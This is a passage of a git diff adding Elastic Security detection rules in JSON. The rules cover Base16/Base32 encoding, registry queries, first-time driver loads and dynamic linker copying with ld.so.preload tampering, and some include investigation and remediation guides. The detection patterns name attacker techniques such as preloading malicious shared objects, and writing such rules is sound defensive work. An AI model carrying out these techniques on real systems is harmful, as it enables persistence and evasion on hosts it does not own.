"debff20a-46bc-4a4d-bae5-5cdd14222795_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_109.json b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_109.json new file mode 100644 index 00000000000..6313be6e764 --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_109.json 
@@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may encode/decode data in an attempt to evade detection by host- or network-based security controls.", + "false_positives": [ + "Automated tools such as Jenkins may encode or decode files as part of their normal behavior. These events can be filtered by the process executable or username values." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Base16 or Base32 Encoding/Decoding Activity", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\") and\nevent.type == \"start\" and process.name in (\"base16\", \"base32\", \"base32plain\", \"base32hex\") and\nnot process.args in (\"--help\", \"--version\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "debff20a-46bc-4a4d-bae5-5cdd14222795", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "debff20a-46bc-4a4d-bae5-5cdd14222795_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_110.json b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_110.json new file mode 100644 index 00000000000..a0a83f5df4a --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/debff20a-46bc-4a4d-bae5-5cdd14222795_110.json 
@@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may encode/decode data in an attempt to evade detection by host- or network-based security controls.", + "false_positives": [ + "Automated tools such as Jenkins may encode or decode files as part of their normal behavior. These events can be filtered by the process executable or username values." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Base16 or Base32 Encoding/Decoding Activity", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name in (\"base16\", \"base32\", \"base32plain\", \"base32hex\") and\nnot process.args in (\"--help\", \"--version\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "debff20a-46bc-4a4d-bae5-5cdd14222795", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "debff20a-46bc-4a4d-bae5-5cdd14222795_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ded09d02-0137-4ccc-8005-c45e617e8d4c_104.json b/packages/security_detection_engine/kibana/security_rule/ded09d02-0137-4ccc-8005-c45e617e8d4c_104.json new file mode 100644 index 00000000000..d4912b0c48e --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/ded09d02-0137-4ccc-8005-c45e617e8d4c_104.json 
@@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "This rule identifies the execution of commands that can be used to query the Windows Registry. Adversaries may query the registry to gain situational awareness about the host, like installed security software, programs and settings.", + "from": "now-24h", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.process-*" + ], + "interval": "24h", + "language": "kuery", + "license": "Elastic License v2", + "name": "Query Registry using Built-in Tools", + "new_terms_fields": [ + "host.id", + "user.id" + ], + "query": "host.os.type:windows and event.category:process and event.type:start and\n (\n (process.name.caseless:\"reg.exe\" and process.args:\"query\") or\n (process.name.caseless:(\"powershell.exe\" or \"powershell_ise.exe\" or \"pwsh.exe\") and\n process.args:(\n (\"get-childitem\" or \"Get-ChildItem\" or \"gci\" or \"dir\" or \"ls\" or\n \"get-item\" or \"Get-Item\" or \"gi\" or\n \"get-itemproperty\" or \"Get-ItemProperty\" or \"gp\") and\n (\"hkcu\" or \"HKCU\" or \"hkey_current_user\" or \"HKEY_CURRENT_USER\" or\n \"hkey_local_machine\" or \"HKEY_LOCAL_MACHINE\" or\n \"hklm\" or \"HKLM\" or registry\\:\\:*)\n )\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.name.caseless", + "type": "unknown" + } + ], + "risk_score": 21, + "rule_id": "ded09d02-0137-4ccc-8005-c45e617e8d4c", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR", + "Data Source: 
Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1012", + "name": "Query Registry", + "reference": "https://attack.mitre.org/techniques/T1012/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 104 + }, + "id": "ded09d02-0137-4ccc-8005-c45e617e8d4c_104", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_7.json b/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_7.json new file mode 100644 index 00000000000..741de6d00d5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/df0fd41e-5590-4965-ad5e-cd079ec22fa9_7.json 
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the load of a driver with an original file name and signature values that were observed for the first time during the last 30 days. This rule type can help baseline drivers installation within your environment.", + "from": "now-9m", + "history_window_start": "now-30d", + "index": [ + "logs-endpoint.events.library-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "First Time Seen Driver Loaded", + "new_terms_fields": [ + "dll.pe.original_file_name", + "dll.code_signature.subject_name" + ], + "note": "## Triage and analysis\n\n### Investigating First Time Seen Driver Loaded\n\nA driver is a software component that allows the operating system to communicate with hardware devices. It works at a high privilege level, the kernel level, having high control over the system's security and stability.\n\nAttackers may exploit known good but vulnerable drivers to execute code in their context because once an attacker can execute code in the kernel, security tools can no longer effectively protect the host. They can leverage these drivers to tamper, bypass and terminate security software, elevate privileges, create persistence mechanisms, and disable operating system protections and monitoring features. Attackers were seen in the wild conducting these actions before acting on their objectives, such as ransomware.\n\nRead the complete research on \"Stopping Vulnerable Driver Attacks\" done by Elastic Security Labs [here](https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks).\n\nThis rule identifies the load of a driver with an original file name and signature values observed for the first time during the last 30 days. 
This rule type can help baseline drivers installation within your environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the driver loaded to identify potentially suspicious characteristics. The following actions can help you gain context:\n - Identify the path that the driver was loaded from. If using Elastic Defend, this information can be found in the `dll.path` field.\n - Examine the digital signature of the driver, and check if it's valid.\n - Examine the creation and modification timestamps of the file:\n - On Elastic Defend, those can be found in the `dll.Ext.relative_file_creation_time` and `\"dll.Ext.relative_file_name_modify_time\"` fields, with the values being seconds.\n - Search for file creation events sharing the same file name as the `dll.name` field and identify the process responsible for the operation.\n - Investigate any other abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n - Use the driver SHA-256 (`dll.hash.sha256` field) hash value to search for the existence and reputation in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Use Osquery to investigate the drivers loaded into the system.\n - !{osquery{\"label\":\"Osquery - Retrieve All Non-Microsoft Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name 
FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE NOT (provider == \\\"Microsoft\\\" AND signed == \\\"1\\\")\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve All Unsigned Drivers with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, class, description, directory, image, issuer_name, manufacturer, service, signed, subject_name FROM drivers JOIN authenticode ON drivers.image = authenticode.path JOIN hash ON drivers.image = hash.path WHERE signed == \\\"0\\\"\\n\"}}\n- Identify the driver's `Device Name` and `Service Name`.\n- Check for alerts from the rules specified in the `Related Rules` section.\n\n### False positive analysis\n\n- Matches derived from these rules are not inherently malicious. The security team should investigate them to ensure they are legitimate and needed, then include them in an allowlist only if required. The security team should address any vulnerable driver installation as it can put the user and the domain at risk.\n\n### Related Rules\n\n- Untrusted Driver Loaded - d8ab1ec1-feeb-48b9-89e7-c12e189448aa\n- Code Signing Policy Modification Through Registry - da7733b1-fe08-487e-b536-0a04c6d8b0cd\n- Code Signing Policy Modification Through Built-in tools - b43570de-a908-4f7f-8bdb-b2df6ffd8c80\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Disable and uninstall all suspicious drivers found in the system. This can be done via Device Manager. (Note that this step may require you to boot the system into Safe Mode)\n- Remove the related services and registry keys found in the system. Note that the service will probably not stop if the driver is still installed.\n - This can be done via PowerShell `Remove-Service` cmdlet.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Ensure that the Driver Signature Enforcement is enabled on the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:\"driver\" and host.os.type:windows and event.action:\"load\"\n", + "references": [ + "https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "df0fd41e-5590-4965-ad5e-cd079ec22fa9", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Persistence", + 
"Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 7 + }, + "id": "df0fd41e-5590-4965-ad5e-cd079ec22fa9_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_108.json b/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_108.json new file mode 100644 index 00000000000..2021e151bf2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/df6f62d9-caab-4b88-affa-044f4395a1e0_108.json 
@@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the copying of the Linux dynamic loader binary and subsequent file creation for the purpose of creating a backup copy. This technique was seen recently being utilized by Linux malware prior to patching the dynamic loader in order to inject and preload a malicious shared object file. This activity should never occur and if it does then it should be considered highly suspicious or malicious.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Dynamic Linker Copy", + "note": "## Triage and analysis\n\n### Investigating Dynamic Linker Copy\n\nThe Linux dynamic linker is responsible for loading shared libraries required by executables at runtime. It is a critical component of the Linux operating system and should not be tampered with. \n\nAdversaries may attempt to copy the dynamic linker binary and create a backup copy before patching it to inject and preload malicious shared object files. This technique has been observed in recent Linux malware attacks and is considered highly suspicious or malicious.\n\nThe detection rule 'Dynamic Linker Copy' is designed to identify such abuse by monitoring for processes with names \"cp\" or \"rsync\" that involve copying the dynamic linker binary (\"/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2\") and modifying the \"/etc/ld.so.preload\" file. Additionally, the rule checks for the creation of new files with the \"so\" extension on Linux systems. By detecting these activities within a short time span (1 minute), the rule aims to alert security analysts to potential malicious behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n### Possible investigation steps\n\n- Investigate the dynamic linker that was copied or altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\n path = '/etc/ld.so.preload' OR\\n path = '/lib64/ld-linux-x86-64.so.2' OR\\n path = '/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2' OR\\n path = '/usr/lib64/ld-linux-x86-64.so.2' OR\\n path = '/usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\n path = '/etc/ld.so.preload' OR\\n path = '/lib64/ld-linux-x86-64.so.2' OR\\n path = '/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2' OR\\n path = '/usr/lib64/ld-linux-x86-64.so.2' OR\\n path = '/usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - 
!{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n- The security team should address any potential benign true positive (B-TP), as this configuration can put the user and the domain at risk.\n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Modification of Dynamic Linker Preload Shared Object Inside A Container - 342f834b-21a6-41bf-878c-87d116eba3ee\n- Modification of Dynamic Linker Preload Shared Object - 717f82c2-7741-4f9b-85b8-d06aeb853f4f\n- Shared Object Created or Changed by Previously Unknown Process - aebaa51f-2a91-4f6a-850b-b601db2293f4\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id with maxspan=1m\n[process where host.os.type == \"linux\" and event.type == \"start\" and process.name in (\"cp\", \"rsync\") and\n process.args in (\n \"/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2\", \"/etc/ld.so.preload\", \"/lib64/ld-linux-x86-64.so.2\",\n \"/usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2\", \"/usr/lib64/ld-linux-x86-64.so.2\"\n )]\n[file where host.os.type == \"linux\" and event.action == \"creation\" and file.extension == \"so\"]\n", + "references": [ + "https://www.intezer.com/blog/incident-response/orbit-new-undetected-linux-threat/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "df6f62d9-caab-4b88-affa-044f4395a1e0", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
